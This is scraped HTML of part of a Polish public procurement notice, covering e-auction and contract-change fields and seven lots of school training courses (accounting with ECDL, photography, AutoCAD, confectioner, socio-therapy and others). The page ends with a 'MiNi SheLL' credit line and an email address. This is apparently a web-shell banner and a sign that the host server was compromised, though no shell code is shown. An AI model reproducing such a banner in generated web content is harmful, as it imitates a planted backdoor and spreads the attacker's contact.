etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1)	zmiany wytycznych w ramach Projektu, o którym mowa w §1 w zakresie mającym wpływ na realizację umowy;2)	nastąpi zmiana kadry realizującej kurs w wyniku nieprzewidywalnych zdarzeń losowych (np. choroba, śmierć, rozwiązanie stosunku pracy), których nie można było przewidzieć w dniu zawarcia umowy, pod warunkiem, że nowo wskazany wykładowca będzie posiadał wykształcenie i doświadczenie w zakresie ilości przeprowadzonych szkoleń z tematu objętego zamówieniem,3)	nastąpi zmiana terminu realizacji usługi spowodowana zmianą kadry realizującej kurs (zgodnie z literą pkt 2) lub ustaleniem terminu egzaminu przez przedstawicieli instytucji zewnętrznych lub koniecznością dostosowania terminu szkolenia do harmonogramu wsparcia wielomodułowego.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data"></span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina"></span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>przeprowadzenie kursu Księgowość dla ekonomistów z ECDL </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Celem kursu jest zapoznanie uczestników (uczniów) z podstawowymi pojęciami oraz operacjami księgowymi z wykorzystaniem programów komputerowych (np. Enova) oraz przygotowanie uczestników do egzaminu ECDL BASE B1-B4. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80000000-4, 80510000-2, 80530000-8, 80531000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">0,60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenie trenera/instruktora</td><td style="border: 1px solid black;border-collapse: collapse;">0,40</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>przeprowadzenie kursu fotografia I i II stopnia </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Celem kursu jest zdobycie wiedzy i umiejętności przez uczestników (uczniów) w zakresie fotografii, komponowania i obróbki obrazu.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80000000-4, 80510000-2, 80530000-8, 80531000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">0,60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenie trenera/instruktora</td><td style="border: 1px solid black;border-collapse: collapse;">0,40</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>"Kurs grafiki komputerowej II i III stopnia" </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Celem kursu jest zdobycie przez uczestników (uczniów) zaawansowanej wiedzy i umiejętności w zakresie technik transformacji obiektów, zdjęć i rysunków.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80000000-4, 80510000-2, 80530000-8, 80531000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">0,60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenie trenera/instruktora</td><td style="border: 1px solid black;border-collapse: collapse;">0,40</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>"Kurs obsługi programu AUTOCAD" </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Celem kursu jest zapoznanie uczestnika z podstawowymi i zaawansowanymi poleceniami i funkcjami programu AutoCAD<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80000000-4, 80510000-2, 80530000-8, 80531000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">0,60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenie trenera/instruktora</td><td style="border: 1px solid black;border-collapse: collapse;">0,40</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td> „Kurs CUKIERNIK”</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Cel: przygotowanie uczestników (uczniów) do uzyskania kwalifikacji w zawodzie Cukiernik, zakończony egz. czeladniczym, po pozytywnym zdaniu egz. Uczestnicy otrzymują kwalifikacje w zawodzie cukiernik (świadectwo czeladnicze). <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80000000-4, 80510000-2, 80530000-8, 80531000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">0,60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenie trenera/instruktora</td><td style="border: 1px solid black;border-collapse: collapse;">0,40</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>„Szkolenie TIK”</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Celem szkolenia jest doskonalenie kompetencji nauczycieli ZS nr 3 w Ostrowcu Św. w zakresie wykorzystania w nauczaniu przedmiotów zawodowych technologii informacyjno-komunikacyjnych sprzyjających kształtowaniu u uczniów kompetencji kluczowych oraz umiejętności uniwersalnych niezbędnych na rynku pracy oraz realizacji nauczania w nowoczesny i atrakcyjny sposób<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80000000-4, 80510000-2, 80530000-8, 80531000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">0,60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenie trenera/instruktora</td><td style="border: 1px solid black;border-collapse: collapse;">0,40</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>7</td><td><b>Nazwa: </b></td><td>Socjoterapii - zajęcia grupowe w SOSW </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 7 zajęcia z Zajęcia z uczniami szkoły.Celem zajęć jest rozwiązywanie problemów uczniów Szkoły Branżowej I Stopnia Specjalnej w Specjalnym Ośrodku Szkolno-Wychowawczym w relacjach interpersonalnych, przepracowanie/korekcja sądów o rzeczywistości.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80000000-4, 80511000-2, 80530000-8<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">0,60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenia instruktora/trenera</td><td style="border: 1px solid black;border-collapse: collapse;">0,40</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com